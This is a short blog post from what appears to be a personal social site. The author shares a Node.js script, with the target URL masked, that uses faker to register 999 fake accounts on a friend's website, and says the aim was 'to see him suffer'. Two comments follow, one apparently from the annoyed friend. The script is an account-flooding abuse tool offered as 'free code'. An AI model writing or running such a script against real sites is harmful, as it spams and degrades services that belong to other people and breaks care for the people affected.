AdrianoTech's profile picture

Published by

published
updated

Category: Web, HTML, Tech

absolutely not nuking random website a friend made :3

FREE CODE!!!11!!


const { faker } = require('@faker-js/faker'); const NUM_ACCOUNTS = 999; async function registerFakeAccount(i) { const username = "weenie" + i; const password = faker.internet.password(); const response = await fetch('################', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ username, password }) }); const data = await response.json(); if (response.ok) { console.log(`✅ Registered: ${username} / ${password}`); } else { console.log(`❌ Failed to register ${username}: ${data.error || response.statusText}`); } } (async () => { for (let i = 0; i < NUM_ACCOUNTS; i++) { await registerFakeAccount(i); } })();


copium

I'm not getting into skid activities, I wanted to see him suffer :3

istg I must make a website that it's the most unsafe thing ever and give access of it to the world and see what happens


0 Kudos

Comments

Displaying 2 of 2 comments ( View all | Add Comment )

bonki

bonki's profile picture
Pinned

i still hate you for this


Report Comment



love you

by AdrianoTech; ; Report

cbladeOfficial

cbladeOfficial's profile picture

not weenie the jr :sob:


Report Comment